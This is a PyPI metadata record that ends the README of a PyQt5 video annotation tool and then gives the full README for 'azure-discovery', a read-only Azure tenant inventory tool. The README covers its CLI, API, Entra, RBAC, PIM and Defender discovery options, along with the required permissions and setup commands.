smoothness:** On some machines (or when the system is under heavy load), video playback may feel choppy and/or audio may stutter. If that happens, click **Restart** or nudge the timeline slider slightly **forward or backward** to help playback re-sync and settle. 
--- ## Creating annotations (label workflow) ### 1) Create Labels On the right panel (**Labels**): - Add label number + name (example: `1: Label1`, `2: Label2`, …) - Each label is assigned a stable color ### 2) Start a label - Select a label - Click **Start** - Move the playhead to where the label begins - Click **Confirm Start** ### 3) End and save - Play forward (or scrub) to where the label ends - Click **End** - Adjust the end position if needed - Click **Confirm End** to save (confidence + notes) This saves an **annotation** for that label. --- ## Timeline & table (review + editing) ### Timeline The timeline shows all labels as colored blocks: - Click a block to view details - Edit to adjust start/end (drag handles) ### Table The table shows every annotation row: - Derived fields are locked for safety - Only key fields can be edited (start/end time, label number, confidence, notes) --- ## Running from Python (advanced) ```python from PyQt5.QtWidgets import QApplication from video_annote.main_window import MainWindow app = QApplication([]) w = MainWindow() w.show() app.exec_() ``` --- ## Troubleshooting ### Playback feels choppy or audio stutters On some systems, playback smoothness depends on your computer’s performance and current load. If video or audio becomes unstable: - Click **Restart**, or - Move the timeline slider slightly **forward or backward** to let playback re-sync. ### Playhead jumps back to the start near the end (known issue) Sometimes, after reaching the end of the **Time Source**, playback may jump back to **00:00**. This usually happens while labeling (after **Confirm Start** or after clicking **End**). When it does, **Confirm End** may not save because the end time becomes earlier than the start time. **Fix:** drag the timeline slider to the desired label end time (away from the start time), then click **Confirm End** again. ## License This project is licensed under the **MIT License**. See `LICENSE` for details. ---
text/markdown
null
Surya Chand Rayala <suryachand2k1@gmail.com>
null
null
MIT License Copyright (c) 2026 Surya Chand Rayala Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
null
[]
[]
null
null
>=3.10
[]
[]
[]
[ "pyqt5==5.15.11" ]
[]
[]
[]
[]
uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:07:00.373323
video_annote-0.1.1.tar.gz
51,208
09/83/ff369c2a33654206618028e316d29c18f42f1a207fb6c99ac5759439fb0e/video_annote-0.1.1.tar.gz
source
sdist
null
false
0de805bfe8a2eebd76afddfc89baab87
438b26bbaeb19c5fbf9bc0c568b45cf4b504493cd8f521c70b077c55a9f372e1
0983ff369c2a33654206618028e316d29c18f42f1a207fb6c99ac5759439fb0e
null
[ "LICENSE" ]
221
2.4
azure-discovery
0.1.9
Lightweight Azure tenant discovery and visualization via Resource Graph. Enumerates subscriptions and resources, normalizes results, and renders interactive dependency graphs. Supports public and sovereign clouds (Gov, China, Germany, Azure Stack).
# Azure Discovery Azure Discovery is a lightweight Azure tenant mapper that enumerates subscriptions and resources via Azure Resource Graph, normalizes the results, and renders an interactive dependency graph. The tool exposes both a Typer-based CLI (`azure-discovery`) and a FastAPI surface so the same discovery workflow can be automated or embedded in other services. The package is published on [PyPI](https://pypi.org/project/azure-discovery/) as **azure-discovery** and can be installed with `pip install azure-discovery`. ## Core capabilities - Builds environment-aware credential chains (Azure CLI + DefaultAzureCredential) with guardrails for unsupported clouds. - Queries Azure Resource Graph with include/exclude filters, tag constraints, and resource group scopes. - Resolves subscriptions automatically when not provided and de-duplicates resources for consistent graph IDs. - Produces JSON summaries, console metrics, and PyVis HTML graphs for quick triage. - Optionally enumerates Entra ID objects via Microsoft Graph (organization/domains, users, groups, applications, service principals, conditional access policies, risky users) with bounded relationship expansion. - Optionally enumerates Azure RBAC role assignments and definitions with principal-to-resource relationship mapping. - Optionally enumerates PIM (Privileged Identity Management) eligible role assignments for both Entra ID roles and Azure resource roles. - Optionally enumerates Defender for Cloud security alerts, assessments, and secure scores for security posture analysis. - Offers identical request/response contracts (Pydantic models) across CLI and API, following the Receive an Object, Return an Object (RORO) pattern. - Supports all Azure clouds: public, Government (GCC/GCC-H), China, Germany, and Azure Stack. - Adaptive rate control and intelligent batching for large-scale tenant discovery. - API hardening with pluggable authentication (Azure AD, API key), rate limiting, audit logging, and CORS. 
## Installation **From PyPI (recommended):** ```bash pip install azure-discovery ``` **With optional development dependencies:** ```bash pip install azure-discovery[dev] ``` **From source (e.g. for development or when embedded in another repo):** ```bash git clone https://github.com/maravedi/AzureDiscovery.git cd AzureDiscovery pip install -e .[dev] ``` ## Package layout When installed, the package provides the **azure_discovery** Python package: ``` azure_discovery/ __init__.py # run_discovery, AzureDiscoveryRequest, AzureDiscoveryResponse, etc. cli.py # Typer command surface (entry point: azure-discovery) api.py # FastAPI app for /discover and visualization endpoints orchestrator.py # Async coordinator for enumeration + visualization adt_types/ # Pydantic models and custom exceptions enumerators/ # Resource Graph query builder and normalization reporting/ # Console logging and HTML/PyVis graph generation utils/ # Azure SDK clients, graph helpers, structured logging ``` ## Usage ### CLI ARM-only discovery: ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> --subscription <sub-id-2> \ --include-type "Microsoft.Compute/virtualMachines" \ --resource-group core-infra \ --required-tag environment=prod \ --visualization-output-dir artifacts/graphs ``` ARM + Entra discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-entra \ --entra-group-membership-max-groups 50 \ --entra-group-membership-max-members-per-group 200 ``` Entra + RBAC discovery only (without Azure resources; pass `--subscription` so RBAC has scope): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id> \ --no-include-azure-resources \ --include-entra \ --include-rbac-assignments ``` ARM + RBAC discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-rbac-assignments \ --include-rbac-definitions \ 
--rbac-scope "/subscriptions/<sub-id-1>" ``` ARM + PIM discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-pim \ --pim-include-entra-eligibilities \ --pim-include-azure-resource-eligibilities ``` ARM + Defender for Cloud discovery (example): ```bash azure-discovery discover \ --tenant-id <tenant-guid> \ --subscription <sub-id-1> \ --include-defender-cloud \ --defender-alert-severity High --defender-alert-severity Critical \ --defender-alert-status Active ``` Using a config file (JSON/TOML/YAML): ```bash # CLI flags override file values azure-discovery discover --config examples/config.example.toml # You can still override specific values azure-discovery discover --config examples/config.example.toml --include-entra --entra-max-objects 10000 ``` Examples: - [examples/config.example.toml](examples/config.example.toml) - [examples/config.example.yaml](examples/config.example.yaml) Configuration docs: - [docs/configuration.md](docs/configuration.md) Tip: you can generate a JSON starter config by running with `--preview-request` and saving stdout. Run as a module from source (from the repo root): ```bash python -m azure_discovery.cli discover --help python -m azure_discovery.cli discover --tenant-id <tenant-guid> --environment azure_gov [options...] ``` ### FastAPI Run the server: ```bash uvicorn azure_discovery.api:app --host 0.0.0.0 --port 8000 --reload ``` Optional: set `AZURE_DISCOVERY_CONFIG=/path/to/discovery.toml` to apply default values to incoming requests (request body fields win). 
Health check: ```bash curl http://localhost:8000/healthz ``` Discovery request (example): ```bash curl -X POST http://localhost:8000/discover \ -H "Content-Type: application/json" \ -d '{ "tenant_id": "<tenant-guid>", "environment": "azure_public", "subscriptions": ["<sub-id>"] }' ``` Enable Entra + relationship expansion (example): ```bash curl -X POST http://localhost:8000/discover \ -H "Content-Type: application/json" \ -d '{ "tenant_id": "<tenant-guid>", "environment": "azure_public", "subscriptions": ["<sub-id>"], "include_entra": true, "include_relationships": true, "entra_group_membership_max_groups": 50, "entra_group_membership_max_members_per_group": 200 }' ``` Download visualization: ```bash curl http://localhost:8000/visuals/<file-name> --output graph.html ``` ### Python Async usage: ```python from azure_discovery import run_discovery from azure_discovery.adt_types import AzureDiscoveryRequest, AzureEnvironment request = AzureDiscoveryRequest( tenant_id="<tenant-guid>", environment=AzureEnvironment.AZURE_PUBLIC, subscriptions=["<sub-id>"], include_entra=True, ) response = await run_discovery(request) print(len(response.nodes), len(response.relationships), response.html_report_path) ``` Load from config file: ```python from pathlib import Path from azure_discovery.utils.config_files import load_request_from_file request = load_request_from_file(Path("examples/config.example.yaml")) ``` Sync script wrapper: ```python import asyncio from azure_discovery import run_discovery from azure_discovery.adt_types import AzureDiscoveryRequest, AzureEnvironment request = AzureDiscoveryRequest( tenant_id="<tenant-guid>", environment=AzureEnvironment.AZURE_PUBLIC, ) response = asyncio.run(run_discovery(request)) print(response.total_resources) ``` ## Azure resources discovery By default (`include_azure_resources=true`), Azure Discovery enumerates Azure resources from subscriptions via Azure Resource Graph. 
You can disable this to focus on other aspects like Entra ID, RBAC, or PIM data only: ```bash # Discover only Entra ID objects and RBAC assignments without Azure resources azure-discovery discover \ --tenant-id <tenant-guid> \ --no-include-azure-resources \ --include-entra \ --include-rbac-assignments ``` Subscriptions are resolved the same way for CLI, API, and Python: when `include_azure_resources` is false, the orchestrator still resolves the subscription list (from request `subscriptions` or from Azure) so RBAC, PIM, and Defender phases have scope. When using `--no-include-azure-resources` with RBAC, PIM, or Defender for Cloud, pass `--subscription` (or set `subscriptions` in your config or API request body) so those phases know which subscriptions to enumerate; otherwise the tool resolves subscriptions from Azure (or fails if none are accessible). This is useful when you want to: - Analyze only identity and access management data without resource inventory - Audit RBAC assignments or PIM eligibilities independently of resource discovery - Reduce discovery time and output size when resource data isn't needed ## Entra ID discovery When `include_entra` is enabled, Azure Discovery queries Microsoft Graph and emits normalized nodes using a `graph://...` ID namespace to avoid collisions with Azure Resource Manager (ARM) IDs. 
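The `graph://...` namespace mentioned above can be illustrated with a short sketch. This is not the tool's actual node builder; the helper name `entra_node_id` is hypothetical and only shows why a distinct URI prefix keeps Microsoft Graph object IDs from ever colliding with ARM resource IDs, which always begin with `/subscriptions/...` or `/providers/...`.

```python
# Hypothetical illustration of the graph:// ID namespace. Microsoft Graph
# objects are keyed by GUID, so a scheme prefix keeps them disjoint from
# ARM IDs, which are rooted at /subscriptions or /providers.

def entra_node_id(object_type: str, object_id: str) -> str:
    """Build a namespaced node ID for a Microsoft Graph object."""
    return f"graph://{object_type}/{object_id}"


arm_id = (
    "/subscriptions/<sub-id>/resourceGroups/rg1"
    "/providers/Microsoft.Compute/virtualMachines/vm1"
)
user_id = entra_node_id("users", "00000000-0000-0000-0000-000000000001")

print(user_id)  # graph://users/00000000-0000-0000-0000-000000000001
# The two namespaces can never produce the same key:
assert user_id.startswith("graph://") and arm_id.startswith("/subscriptions/")
```
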
### Entra node types Typical Entra collections include: - Microsoft.Graph/Organization and Microsoft.Graph/Domain - Microsoft.Graph/User and Microsoft.Graph/Group - Microsoft.Graph/Application and Microsoft.Graph/ServicePrincipal - Microsoft.Graph/ConditionalAccessPolicy - Microsoft.Graph/RiskyUser ### Entra relationships When `include_relationships` is enabled, Azure Discovery can emit bounded edges: - `has_domain` (organization -> domain) - `has_member` (group -> member) when group membership expansion is enabled - `has_owner` (application/servicePrincipal -> owner) when ownership expansion is enabled - `appId` (servicePrincipal -> application) correlation edges when both are enumerated All relationship expansion is capped by request parameters (see CLI options below) to avoid blowing up graphs in large tenants. ## Azure RBAC discovery When `include_rbac_assignments` or `include_rbac_definitions` is enabled, Azure Discovery enumerates Azure role-based access control (RBAC) data: - **Role assignments**: Who has what access to which resources (active assignments) - **Role definitions**: Built-in and custom role definitions with their permissions - **RBAC relationships**: Principal → RoleAssignment → Resource graph edges (when `include_relationships` is enabled) This capability is useful for security posture assessment, access reviews, and understanding the permission landscape across your Azure estate. ## PIM (Privileged Identity Management) discovery When `include_pim` is enabled, Azure Discovery enumerates eligible role assignments that users can activate on-demand: - **Entra ID role eligibilities**: Eligible assignments for directory roles (Global Administrator, User Administrator, etc.) - **Azure resource role eligibilities**: Eligible assignments for Azure resource roles (Owner, Contributor, etc. 
at subscription/resource group/resource scope) - **Eligibility schedules**: Time-bound eligibility windows with start/end dates - **PIM relationships**: Principal → RoleEligibility → Resource/RoleDefinition graph edges (when `include_relationships` is enabled) PIM eligibilities represent just-in-time (JIT) access that must be activated before use. This differs from standard RBAC assignments which are always active. PIM discovery helps identify: - Standing privileged access (who is eligible for high-privilege roles) - Dormant privileged accounts (eligibilities that haven't been activated recently) - Compliance with least-privilege policies (eligibilities with appropriate time boundaries) - Shadow admins (users with eligible assignments to privileged roles) ### PIM node types - **Microsoft.Graph.PIM/roleEligibilitySchedules**: Entra ID role eligibilities (eligible for directory roles) - **Microsoft.Graph.PIM/roleEligibilityScheduleRequests**: Pending/active Entra role eligibility requests - **Microsoft.Authorization/roleEligibilitySchedules**: Azure resource role eligibilities (eligible for ARM roles) ### PIM relationships When `include_relationships` is enabled, Azure Discovery creates edges between PIM eligibilities and related entities: - `has_eligible_role` (principal -> eligibility): Links users/groups/service principals to their eligible role assignments - `eligible_for` (eligibility -> resource): Links Azure resource eligibilities to the resources they grant access to - `eligible_via_role` (eligibility -> role definition): Links eligibilities to the role definitions they represent ### PIM filtering You can filter PIM eligibilities by scope to focus on specific subscriptions or resource groups: ```bash # Only eligibilities for a specific subscription azure-discovery discover \ --tenant-id <tenant-guid> \ --include-pim \ --pim-scope "/subscriptions/<sub-id>" # Only eligibilities for a specific resource group azure-discovery discover \ --tenant-id <tenant-guid> \ 
--include-pim \ --pim-scope "/subscriptions/<sub-id>/resourceGroups/<rg-name>" ``` This capability is useful for security audits, compliance reviews, privileged access management, and identifying potential attack paths through JIT privilege escalation. ### PIM Permissions Setup PIM discovery requires specific Microsoft Graph API permissions and licensing. For detailed setup instructions, see: **[PIM Permissions Guide](docs/PIM_PERMISSIONS_GUIDE.md)** - Complete guide for: - Service principal configuration - User permission setup - Licensing requirements - Azure resource PIM onboarding - Troubleshooting permission issues Quick reference for common scenarios: - **Interactive users**: Requires **Global Reader** or **Privileged Role Administrator** Entra ID role + `RoleManagement.Read.Directory` consent - **Service principals**: Requires `RoleManagement.Read.Directory` application permission + admin consent - **Licensing**: Requires **Entra ID P2** or **Entra ID Governance** license ## Defender for Cloud discovery When `include_defender_cloud` is enabled, Azure Discovery enumerates security findings from Microsoft Defender for Cloud: - **Security alerts**: Active threats, suspicious activity, and security incidents detected across your Azure resources. Each alert includes MITRE ATT&CK tactics and techniques, affected resources, remediation steps, and severity ratings. - **Security assessments**: Vulnerability findings, compliance recommendations, and security best practices. Assessments identify configuration gaps and provide remediation guidance. - **Secure scores**: Subscription-level security posture scores that quantify your current security state (e.g., 42.5/100). ### Defender node types - **Microsoft.Security/alerts**: Security alerts with properties like severity (High, Medium, Low, Informational), status (Active, Resolved, Dismissed), MITRE ATT&CK techniques, and affected resources. 
- **Microsoft.Security/assessments**: Security assessments with severity, status (Healthy, Unhealthy, NotApplicable), categories (Data, Network, Compute, etc.), and remediation descriptions. - **Microsoft.Security/secureScores**: Subscription security posture scores with current/max values and percentage. ### Defender relationships When `include_relationships` is enabled, Azure Discovery creates edges between security findings and affected resources: - `affects` (alert -> resource): Links security alerts to the VMs, storage accounts, or other resources they impact. - `affects` (assessment -> resource): Links security assessments to the resources that have vulnerabilities or misconfigurations. These relationships enable security-focused graph queries like "Show me all High severity alerts affecting production VMs" or "Which resources have the most unhealthy assessments?" ### Defender filtering You can filter security findings to reduce noise and focus on critical issues: ```bash # Only High and Critical severity alerts that are Active azure-discovery discover \ --tenant-id <tenant-guid> \ --include-defender-cloud \ --defender-alert-severity High --defender-alert-severity Critical \ --defender-alert-status Active # Only Unhealthy assessments (skip Healthy and NotApplicable) azure-discovery discover \ --tenant-id <tenant-guid> \ --include-defender-cloud \ --defender-assessment-status Unhealthy # Alerts only (disable assessments and scores) azure-discovery discover \ --tenant-id <tenant-guid> \ --include-defender-cloud \ --no-defender-include-assessments \ --no-defender-include-secure-scores ``` Config file example (YAML): ```yaml include_defender_cloud: true defender_config: include_security_alerts: true include_security_assessments: true include_secure_scores: true alert_severity_filter: - High - Critical alert_status_filter: - Active assessment_status_filter: - Unhealthy ``` This capability is useful for security operations, vulnerability management, compliance 
tracking, and prioritizing remediation efforts based on actual threats and exposures. ## Prerequisites - Python 3.11+ - Azure CLI 2.60+ (optional, used when `--prefer-cli` is set) or service principal credentials exported as `AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, and `AZURE_CLIENT_SECRET` - Azure Resource Graph access (Reader or above on the subscriptions you plan to scan) - Microsoft Graph access (only required when using `--include-entra`) - Network egress to `management.azure.com` and `api.azure.com` (and to the Graph endpoint for the cloud you select) ## Required permissions ### Azure Resource Graph (ARM) | Capability | Minimum RBAC role | Scope recommendation | | ---------- | ----------------- | -------------------- | | Run Resource Graph queries | `Reader`, `Resource Graph Reader`, or any custom role with `Microsoft.ResourceGraph/*/read` | Every subscription you plan to inventory or the parent management group | | Auto-discover subscriptions (when `--subscription` is omitted) | `Reader` on the management group or `Directory.Read.All` consent for service principals | Tenant root (`/providers/Microsoft.Management/managementGroups/<root>`) | | Register Microsoft.ResourceGraph (one-time) | `Contributor` or `Owner` | Each subscription being scanned | | Read role assignments | `Reader` or `Role Based Access Control Administrator (read-only)` | Subscription or management group | | Read role definitions | `Reader` | Subscription | | Read PIM eligible assignments (Entra roles) | N/A (requires Microsoft Graph permissions - see below) | Tenant | | Read PIM eligible assignments (Azure resources) | `Reader` or `Role Based Access Control Administrator (read-only)` | Subscription or management group | | Read Defender for Cloud alerts and assessments | `Reader` or `Security Reader` | Subscription | The tool never mutates resources, but it cannot enumerate subscriptions or call Resource Graph unless the identity has at least `Reader` at the relevant scope. 
Grant the narrowest scope that still covers your target estate. ### Microsoft Graph (Entra) Azure Discovery uses Microsoft Graph delegated permissions when running as a signed-in user (for example, Azure CLI/device code flows), and application permissions when running headless (service principal / managed identity). The following table is a practical starting point for *read-only* discovery. Always follow least privilege, and prefer narrower resource-specific permissions over broad directory-wide permissions where possible. | Discovery area | Typical endpoints | Delegated permissions | Application permissions | Notes | | --- | --- | --- | --- | --- | | Users | `/users` | `User.ReadBasic.All` or `User.Read.All` (or `Directory.Read.All`) | `User.Read.All` (or `Directory.Read.All`) | Guests can't call `/users`. | | Groups + members | `/groups`, `/groups/{id}/members` | `Group.Read.All` + `GroupMember.Read.All` (or `Directory.Read.All`) | `Group.Read.All` + `GroupMember.Read.All` (or `Directory.Read.All`) | Hidden memberships may require additional permissions depending on tenant settings. | | Applications + service principals | `/applications`, `/servicePrincipals` | `Application.Read.All` (or `Directory.Read.All`) | `Application.Read.All` (or `Directory.Read.All`) | Needed for enumerating apps/SPs and owner expansion. | | Conditional Access policies | `/identity/conditionalAccess/policies` | `Policy.Read.All` | `Policy.Read.All` | Delegated access typically requires an Entra role such as Conditional Access Administrator or similar security read roles. | | Risky users (Identity Protection) | `/identityProtection/riskyUsers` | `IdentityRiskyUser.Read.All` | `IdentityRiskyUser.Read.All` | Requires Entra ID Identity Protection licensing (commonly P2). 
| | PIM Entra role eligibilities | `/roleManagement/directory/roleEligibilitySchedules` | `RoleEligibilitySchedule.Read.Directory` or `RoleManagement.Read.Directory` or `RoleManagement.Read.All` | `RoleEligibilitySchedule.Read.Directory` or `RoleManagement.Read.Directory` or `RoleManagement.Read.All` | Requires Entra ID P2 or Entra ID Governance licensing. Delegated access typically requires an Entra role such as Privileged Role Administrator or Global Reader. | References: - List users permissions: https://learn.microsoft.com/en-us/graph/api/user-list?view=graph-rest-1.0 - Conditional Access policy list permissions: https://learn.microsoft.com/en-us/graph/api/conditionalaccessroot-list-policies?view=graph-rest-1.0 - Identity Protection API tutorial (role + delegated scope examples): https://learn.microsoft.com/en-us/graph/tutorial-riskdetection-api - PIM API overview: https://learn.microsoft.com/en-us/graph/api/resources/privilegedidentitymanagementv3-overview - Role eligibility schedules API: https://learn.microsoft.com/en-us/graph/api/rbacapplication-list-roleeligibilityschedules ### Granting Microsoft Graph permissions for PIM PIM enumeration requires specific Microsoft Graph API permissions. Follow these steps to grant permissions: #### For Service Principals (Application Permissions) 1. **Register an application** in Entra ID (if not already done): ```bash az ad app create --display-name "Azure Discovery PIM" ``` 2. **Grant Microsoft Graph API permissions**: ```bash # Get the application ID APP_ID=$(az ad app list --display-name "Azure Discovery PIM" --query "[0].appId" -o tsv) # Grant RoleManagement.Read.Directory permission (read PIM eligibilities) az ad app permission add \ --id $APP_ID \ --api 00000003-0000-0000-c000-000000000000 \ --api-permissions 741c54c2-4c95-4eda-87e4-e8b36d2d93bb=Role ``` 3. **Admin consent** (requires Global Administrator or Privileged Role Administrator): ```bash az ad app permission admin-consent --id $APP_ID ``` 4. 
**Create service principal and secret**: ```bash az ad sp create --id $APP_ID az ad sp credential reset --id $APP_ID --years 1 ``` 5. **Assign Entra ID role** (for delegated scenarios or enhanced permissions): - Assign **Privileged Role Administrator** or **Global Reader** role to the service principal - This is in addition to the API permissions above #### For Users (Delegated Permissions) 1. **Entra ID role assignment**: Assign one of these roles to the user account: - **Privileged Role Administrator** (can read all PIM configurations) - **Global Reader** (read-only access to all tenant data including PIM) - **Security Reader** (read security-related data including some PIM data) 2. **API permissions**: When using delegated flow (e.g., `az login`), consent to: - `RoleManagement.Read.Directory` or - `RoleEligibilitySchedule.Read.Directory` 3. **Interactive consent** (first run): ```bash az login --scope https://graph.microsoft.com/RoleManagement.Read.Directory ``` #### Licensing Requirements **CRITICAL**: PIM functionality requires one of the following licenses: - **Entra ID P2** (formerly Azure AD Premium P2) - **Entra ID Governance** (includes PIM capabilities) - **Microsoft 365 E5** (includes Entra ID P2) Without proper licensing, the PIM APIs will return 403 Forbidden even with correct permissions. ### Service principal flow (CLI based) ``` az ad sp create-for-rbac \ --name azure-discovery-sp \ --role "Reader" \ --scopes /subscriptions/<sub-id-1> /subscriptions/<sub-id-2> \ --years 1 az role assignment create \ --assignee <appId> \ --role "Resource Graph Reader" \ --scope /subscriptions/<sub-id-1> ``` Export the emitted `appId`, `tenant`, and `password` as `AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, and `AZURE_CLIENT_SECRET`. Repeat the role assignment command for every subscription or assign at the management group scope (`/providers/Microsoft.Management/managementGroups/<mg-id>`) to cover multiple subscriptions at once. ### User-assigned permissions (Portal) 1. 
Open Azure Portal → **Subscriptions** → select each target subscription. 2. Navigate to **Access control (IAM)** → **Add** → **Add role assignment**. 3. Pick the `Reader` (or `Resource Graph Reader`) role, then select the user or managed identity that will run AzureDiscovery. 4. If you want automatic subscription discovery, repeat the assignment at the tenant root management group (visible under **Management groups**). Users need the **Azure RBAC Reader** role there. ### Provider registration and validation Run the following once per subscription to ensure the Resource Graph service is registered and the identity can query it: ``` az account set --subscription <sub-id> az provider register --namespace Microsoft.ResourceGraph az graph query -q "Resources | take 1" ``` Successful output from `az graph query` confirms both the provider registration and the assigned role. If the command fails with `AuthorizationFailed`, double-check the scope of the role assignments and replicate them for every subscription you intend to scan. ## Configuration reference | Option | Description | | ------ | ----------- | | `--config` | Path to JSON/TOML/YAML config file (AzureDiscoveryRequest shape). CLI flags override file values. | | `--tenant-id` | Required Entra ID tenant GUID. | | `--environment` | Azure cloud (`azure_public`, `azure_gov`, `azure_china`, `azure_germany`, `azure_stack`). | | `--subscription/-s` | Repeatable flag to scope runs to explicit subscription IDs. Omit to auto-resolve. When using `--no-include-azure-resources`, pass this so RBAC/PIM/Defender know which subscriptions to enumerate. | | `--include-azure-resources/--no-include-azure-resources` | Include Azure resources from Resource Graph (default: true). When false, only Entra/RBAC/PIM/Defender data is collected; subscriptions are still resolved from `--subscription` or Azure. | | `--include-entra` | Include Entra ID resources via Microsoft Graph. 
| | `--include-rbac-assignments` | Include Azure role assignments in discovery. | | `--include-rbac-definitions` | Include Azure role definitions (built-in and custom). | | `--rbac-scope` | Filter role assignments by scope (repeatable). | | `--include-pim` | Include PIM (Privileged Identity Management) eligible role assignments. | | `--pim-include-entra-eligibilities/--no-pim-include-entra-eligibilities` | Include Entra ID role eligibilities (default: true when PIM enabled). | | `--pim-include-entra-requests` | Include pending/active Entra role eligibility requests. | | `--pim-include-azure-resource-eligibilities/--no-pim-include-azure-resource-eligibilities` | Include Azure resource role eligibilities (default: true when PIM enabled). | | `--pim-scope` | Filter PIM eligibilities by scope (repeatable). | | `--include-defender-cloud` | Include Defender for Cloud security findings (alerts, assessments, scores). | | `--defender-include-alerts/--no-defender-include-alerts` | Include security alerts from Defender for Cloud (default: true when defender enabled). | | `--defender-include-assessments/--no-defender-include-assessments` | Include security assessments (default: true when defender enabled). | | `--defender-include-secure-scores/--no-defender-include-secure-scores` | Include secure scores (default: true when defender enabled). | | `--defender-alert-severity` | Filter alerts by severity: High, Medium, Low, Informational (repeatable). | | `--defender-alert-status` | Filter alerts by status: Active, Resolved, Dismissed (repeatable). | | `--defender-assessment-severity` | Filter assessments by severity: High, Medium, Low (repeatable). | | `--defender-assessment-status` | Filter assessments by status: Healthy, Unhealthy, NotApplicable (repeatable). | | `--scale-controls/--no-scale-controls` | Enable adaptive rate control for large tenants (default: enabled). | | `--scale-initial-rps` | Initial requests per second for adaptive rate control (default: 10.0). 
| | `--scale-max-concurrent-batches` | Maximum concurrent batch operations (default: 5). | | `--scale-initial-batch-size` | Initial batch size for paginated operations (default: 1000). | | `--entra-include-organization/--no-entra-include-organization` | Include organization (tenant root) node. | | `--entra-include-domains/--no-entra-include-domains` | Include tenant domains. | | `--entra-include-users/--no-entra-include-users` | Include Entra users. | | `--entra-include-groups/--no-entra-include-groups` | Include Entra groups. | | `--entra-include-applications/--no-entra-include-applications` | Include Entra applications. | | `--entra-include-conditional-access-policies/--no-entra-include-conditional-access-policies` | Include conditional access policies (requires permissions). | | `--entra-include-risky-users/--no-entra-include-risky-users` | Include risky users (requires permissions). | | `--entra-group-membership-max-groups` | Max groups to expand membership for (0 disables expansion). | | `--entra-group-membership-max-members-per-group` | Max members per group during expansion (0 disables expansion). | | `--entra-ownership-max-apps` | Max applications to expand owners for (0 disables expansion). | | `--entra-ownership-max-owners-per-app` | Max owners per app during expansion (0 disables expansion). | | `--entra-sp-ownership-max-sps` | Max service principals to expand owners for (0 disables SP ownership expansion). | | `--entra-sp-ownership-max-owners-per-sp` | Max owners per service principal during expansion (0 disables expansion). | | `--include-relationships/--no-include-relationships` | Include inferred and expanded relationships/edges (Graph expansions require this). | | `--graph-total-max-objects` | Maximum total objects across all Graph collections (0 = unlimited). | | `--entra-max-objects` | Maximum objects per Entra collection (0 = unlimited). | | `--include-type` / `--exclude-type` | Filter resource types (case-insensitive). 
| | `--resource-group` | Restrict discovery to named resource groups. | | `--required-tag` | Enforce tag key=value pairs (repeatable). | | `--prefer-cli` | Place Azure CLI credentials at the front of the chain. | | `--visualization-output-dir` | Directory for PyVis HTML output (default `artifacts/graphs`). | | `--visualization-file` | Override the generated HTML file name. | | `--output/-o` | Write JSON output to file instead of stdout. | | `--quiet/-q` | Suppress all logs except errors. | | `--format/-f` | Output format: `json` (default) or `json-compact`. | | `--preview-request/--dry-run` | Print the constructed discovery request JSON and exit (no discovery). | | `--validate-auth` | Run a preflight auth check (token acquisition for ARM and Graph) and exit. Use `--probe-connectivity` to also validate connectivity. | Subcommands: `discover` (run discovery), `version` (print package version and exit). Programmatic workflows can instantiate `AzureDiscoveryRequest` directly and call `orchestrator.run_discovery`, receiving an `AzureDiscoveryResponse` that contains resolved subscriptions, normalized nodes, inferred relationships, and an optional `html_report_path`. ### Output and logging separation By default, the CLI writes JSON results to stdout and logs to stderr. 
This allows clean piping: ```bash # Pipe JSON output to jq for filtering azure-discovery discover --tenant-id <id> | jq '.discovered_subscriptions' # Write output to file and suppress logs azure-discovery discover --tenant-id <id> --output results.json --quiet # Compact JSON output for scripting azure-discovery discover --tenant-id <id> --format json-compact ``` ## Development ### Quick start ```bash # Install with development dependencies make install-dev # Run tests make test # Format code make format # Run linting make lint # Type checking make typecheck # Generate coverage report make coverage ``` ### Available make commands Run `make help` to see all available commands: - `make install` - Install package dependencies - `make install-dev` - Install with development dependencies - `make test` - Run tests with pytest - `make lint` - Run ruff linter - `make format` - Format code with ruff - `make typecheck` - Run mypy type checking - `make coverage` - Generate test coverage report - `make clean` - Remove build artifacts and cache - `make run-api` - Run FastAPI server locally ### Pre-commit hooks Install pre-commit hooks to automatically run linting and formatting on commit: ```bash pip install pre-commit pre-commit install ``` This will run ruff formatting, linting, and mypy type checking before each commit. ### Environment variables Copy `.env.example` to `.env` and configure your Azure credentials: ```bash cp .env.example .env # Edit .env with your credentials ``` For detailed contributing guidelines, see [CONTRIBUTING.md](CONTRIBUTING.md). ## Troubleshooting ### General Issues - **`AzureClientError: Unable to enumerate subscriptions`** – ensure the identity has at least `Reader` on one subscription and that the Resource Graph service is registered (`az provider register --namespace Microsoft.ResourceGraph`). 
